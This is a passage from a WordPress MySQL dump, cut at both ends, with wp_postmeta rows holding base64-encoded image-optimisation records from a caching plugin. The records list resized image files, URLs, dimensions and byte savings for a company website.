lci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4MjgsInRpbWUiOjE0ODM1OTE2NzMsImlkIjoxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NjAyLCJ0aW1lIjoxNDgzNTkxNjc2LCJpZCI6MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjY5NSwidGltZSI6MTQ4MzU5MTY4MCwiaWQiOjE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo5NTMsInRpbWUiOjE0ODM1OTE2ODMsImlkIjoxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTUxLCJ0aW1lIjoxNDgzNTkxNjg3LCJpZCI6MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjExMjEsInRpbWUiOjE0ODM1OTE2OTAsImlkIjoxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTE3NSwidGltZSI6MTQ4MzU5MTY5NCwiaWQiOjE3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30447, 16, 'wpfc_optimisation_reduction', '595873'); 
INSERT INTO `wp_postmeta` VALUES (30448, 16, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUuanBnIiwid2lkdGgiOjI0MDAsImhlaWdodCI6MTgwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0F1dG9tb3RpdmUuanBnIiwicmVkdWN0aW9uIjo1OTU2MjEsInRpbWUiOjE0ODM1OTE3MDQsImlkIjoiMTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTcwNiwiaWQiOjE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtODAweDYwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTgwMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS04MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTcwOSwiaWQiOjE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtNzY4eDU3Ni5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU3NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTc2OHg1NzYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS03Njh4NTc2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTcxMSwiaWQiOjE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMTYwMHgxMjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0xNjAweDEyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0xNjAweDEyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzE1LCJpZCI6MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzE3LCJpZCI6MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzE5LCJpZCI6MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzIyLCJpZCI6MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzI0LCJpZCI6MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjIzOSwidGltZSI6MTQ4MzU5MTcyNiwiaWQiOjE2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzI5LCJpZCI6MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3MzEsImlkIjoxNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTczMywiaWQiOjE2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0F1dG9tb3RpdmUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzM2LCJpZCI6MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BdXRvbW90aXZlLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXV0b21vdGl2ZS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0F1dG9tb3RpdmUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3MzgsImlkIjoxNn1d'); 
INSERT INTO `wp_postmeta` VALUES (30449, 15, 'wpfc_optimisation_reduction', '1970233'); 
INSERT INTO `wp_postmeta` VALUES (30450, 15, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UuanBnIiwicmVkdWN0aW9uIjoxOTcwMjE5LCJ0aW1lIjoxNDgzNTkxNzQ5LCJpZCI6IjE1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3NTEsImlkIjoxNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3NTQsImlkIjoxNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3NTcsImlkIjoxNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc2MCwiaWQiOjE1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc2MiwiaWQiOjE1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMD